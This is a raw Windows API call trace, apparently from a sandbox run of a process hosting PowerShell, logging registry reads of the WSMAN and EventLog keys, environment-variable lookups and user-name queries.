	[0763.498] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xb136d3df, Data2=0xb9e, Data3=0x4bd3, Data4=([0]=0xa4, [1]=0xd8, [2]=0xa1, [3]=0x54, [4]=0xc2, [5]=0xe8, [6]=0xf4, [7]=0x3c))) returned 0x0
	[0763.498] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x903cfd21, Data2=0x841e, Data3=0x4d83, Data4=([0]=0x80, [1]=0xfb, [2]=0xd, [3]=0xa2, [4]=0x6f, [5]=0x83, [6]=0x0, [7]=0x55))) returned 0x0
	[0763.511] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0763.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.511] CoTaskMemFree (pv=0x51cf00) 
	[0763.511] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0763.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.511] CoTaskMemFree (pv=0x51cf00) 
	[0763.512] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0763.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.512] CoTaskMemFree (pv=0x51cf00) 
	[0763.512] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0763.512] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0763.512] CoTaskMemFree (pv=0x51cf00) 
	[0764.596] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0764.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.596] CoTaskMemFree (pv=0x51cf00) 
	[0764.597] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0764.597] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.597] CoTaskMemFree (pv=0x51cf00) 
	[0764.598] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0764.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0764.598] CoTaskMemFree (pv=0x51cf00) 
	[0764.602] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6d8 | out: phkResult=0x24d6d8*=0x2f0) returned 0x0
	[0764.603] RegQueryInfoKeyW (in: hKey=0x2f0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d5dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d5d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d5dc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d5d8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0764.603] CoTaskMemFree (pv=0x0) 
	[0764.603] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0764.603] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x0, lpValueName=0x4c7640, lpcchValueName=0x24d688, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d688, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0764.603] CoTaskMemFree (pv=0x4c7640) 
	[0764.603] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0764.603] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x1, lpValueName=0x4c7640, lpcchValueName=0x24d688, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d688, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0764.603] CoTaskMemFree (pv=0x4c7640) 
	[0764.603] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0764.604] RegEnumValueW (in: hKey=0x2f0, dwIndex=0x2, lpValueName=0x4c7640, lpcchValueName=0x24d688, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d688, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0764.604] CoTaskMemFree (pv=0x4c7640) 
	[0764.604] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d66c, lpData=0x0, lpcbData=0x24d668*=0x0 | out: lpType=0x24d66c*=0x1, lpData=0x0, lpcbData=0x24d668*=0x8) returned 0x0
	[0764.604] CoTaskMemAlloc (cb=0xc) returned 0x5331d0
	[0764.604] RegQueryValueExW (in: hKey=0x2f0, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d63c, lpData=0x5331d0, lpcbData=0x24d638*=0x8 | out: lpType=0x24d63c*=0x1, lpData="2.0", lpcbData=0x24d638*=0x8) returned 0x0
	[0764.604] CoTaskMemFree (pv=0x5331d0) 
	[0777.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d628 | out: phkResult=0x24d628*=0x314) returned 0x0
	[0777.432] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d52c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d528, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d52c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d528*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0777.432] CoTaskMemFree (pv=0x0) 
	[0777.432] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0777.432] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x4c7640, lpcchValueName=0x24d5d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x24d5d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0777.432] CoTaskMemFree (pv=0x4c7640) 
	[0777.432] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0777.432] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x4c7640, lpcchValueName=0x24d5d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x24d5d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0777.432] CoTaskMemFree (pv=0x4c7640) 
	[0777.432] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0777.432] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x4c7640, lpcchValueName=0x24d5d8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x24d5d8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0777.432] CoTaskMemFree (pv=0x4c7640) 
	[0777.432] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d5bc, lpData=0x0, lpcbData=0x24d5b8*=0x0 | out: lpType=0x24d5bc*=0x1, lpData=0x0, lpcbData=0x24d5b8*=0x8) returned 0x0
	[0777.432] CoTaskMemAlloc (cb=0xc) returned 0x533710
	[0777.433] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0x24d58c, lpData=0x533710, lpcbData=0x24d588*=0x8 | out: lpType=0x24d58c*=0x1, lpData="2.0", lpcbData=0x24d588*=0x8) returned 0x0
	[0777.433] CoTaskMemFree (pv=0x533710) 
	[0777.434] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0777.434] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.434] CoTaskMemFree (pv=0x51cf00) 
	[0777.440] CoTaskMemAlloc (cb=0x104) returned 0x51cf00
	[0777.440] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x51cf00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0777.440] CoTaskMemFree (pv=0x51cf00) 
	[0778.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d658 | out: phkResult=0x24d658*=0x318) returned 0x0
	[0778.637] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d5cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d5c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d5cc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d5c8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.637] CoTaskMemFree (pv=0x0) 
	[0778.638] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.638] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.638] CoTaskMemFree (pv=0x4c7640) 
	[0778.638] CoTaskMemFree (pv=0x0) 
	[0778.638] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.638] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.638] CoTaskMemFree (pv=0x4c7640) 
	[0778.639] CoTaskMemFree (pv=0x0) 
	[0778.639] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.639] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.639] CoTaskMemFree (pv=0x4c7640) 
	[0778.639] CoTaskMemFree (pv=0x0) 
	[0778.639] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.639] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.639] CoTaskMemFree (pv=0x4c7640) 
	[0778.639] CoTaskMemFree (pv=0x0) 
	[0778.639] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.639] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.639] CoTaskMemFree (pv=0x4c7640) 
	[0778.639] CoTaskMemFree (pv=0x0) 
	[0778.639] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.639] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.639] CoTaskMemFree (pv=0x4c7640) 
	[0778.639] CoTaskMemFree (pv=0x0) 
	[0778.639] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.639] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.640] CoTaskMemFree (pv=0x4c7640) 
	[0778.640] CoTaskMemFree (pv=0x0) 
	[0778.640] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.640] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.640] CoTaskMemFree (pv=0x4c7640) 
	[0778.640] CoTaskMemFree (pv=0x0) 
	[0778.640] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.640] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x4c7640, lpcchName=0x24d658, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d658, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0778.640] CoTaskMemFree (pv=0x4c7640) 
	[0778.640] CoTaskMemFree (pv=0x0) 
	[0778.640] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x31c) returned 0x0
	[0778.640] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.640] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x320) returned 0x0
	[0778.640] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.641] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x324) returned 0x0
	[0778.641] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.641] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x328) returned 0x0
	[0778.641] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.641] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x32c) returned 0x0
	[0778.641] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.641] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x330) returned 0x0
	[0778.641] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.641] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x334) returned 0x0
	[0778.644] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.644] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x338) returned 0x0
	[0778.645] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x0) returned 0x2
	[0778.645] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x33c) returned 0x0
	[0778.645] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x340) returned 0x0
	[0778.645] RegCloseKey (hKey=0x340) returned 0x0
	[0778.645] RegCloseKey (hKey=0x318) returned 0x0
	[0778.646] RegCloseKey (hKey=0x33c) returned 0x0
	[0778.657] CoTaskMemAlloc (cb=0x804) returned 0x1b917070
	[0778.657] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b917070, nSize=0x24d8c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24d8c8) returned 0x1
	[0778.663] CoTaskMemFree (pv=0x1b917070) 
	[0778.664] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0778.664] GetUserNameW (in: lpBuffer=0x4c7640, pcbBuffer=0x24d908 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x24d908) returned 1
	[0778.666] CoTaskMemFree (pv=0x4c7640) 
	[0779.573] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d608 | out: phkResult=0x24d608*=0x344) returned 0x0
	[0779.573] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x24d57c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d578, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x24d57c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x24d578*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.573] CoTaskMemFree (pv=0x0) 
	[0779.573] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.573] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.573] CoTaskMemFree (pv=0x4c7640) 
	[0779.573] CoTaskMemFree (pv=0x0) 
	[0779.574] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.574] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.574] CoTaskMemFree (pv=0x4c7640) 
	[0779.574] CoTaskMemFree (pv=0x0) 
	[0779.574] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.574] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.574] CoTaskMemFree (pv=0x4c7640) 
	[0779.574] CoTaskMemFree (pv=0x0) 
	[0779.574] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.574] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.574] CoTaskMemFree (pv=0x4c7640) 
	[0779.574] CoTaskMemFree (pv=0x0) 
	[0779.574] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.574] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.574] CoTaskMemFree (pv=0x4c7640) 
	[0779.574] CoTaskMemFree (pv=0x0) 
	[0779.575] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.575] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.575] CoTaskMemFree (pv=0x4c7640) 
	[0779.575] CoTaskMemFree (pv=0x0) 
	[0779.575] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.575] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.575] CoTaskMemFree (pv=0x4c7640) 
	[0779.575] CoTaskMemFree (pv=0x0) 
	[0779.575] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.575] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.575] CoTaskMemFree (pv=0x4c7640) 
	[0779.575] CoTaskMemFree (pv=0x0) 
	[0779.575] CoTaskMemAlloc (cb=0x204) returned 0x4c7640
	[0779.575] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x4c7640, lpcchName=0x24d608, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x24d608, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0779.575] CoTaskMemFree (pv=0x4c7640) 
	[0779.575] CoTaskMemFree (pv=0x0) 
	[0779.576] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x348) returned 0x0
	[0779.576] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.576] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x34c) returned 0x0
	[0779.576] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.576] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x350) returned 0x0
	[0779.576] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.576] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x354) returned 0x0
	[0779.576] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.576] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x358) returned 0x0
	[0779.577] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.577] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x35c) returned 0x0
	[0779.577] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.577] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x360) returned 0x0
	[0779.577] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.577] RegOpenKeyExW (in: hKey=0x344, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x364) returned 0x0
	[0779.577] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x0) returned 0x2
	[0779.577] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x368) returned 0x0
	[0779.577] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d668 | out: phkResult=0x24d668*=0x36c) returned 0x0
	[0779.578] RegCloseKey (hKey=0x36c) returned 0x0
	[0779.578] RegCloseKey (hKey=0x344) returned 0x0
	[0779.578] RegCloseKey (hKey=0x368) returned 0x0
	[0779.579] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d608 | out: phkResult=0x24d608*=0x368) returned 0x0
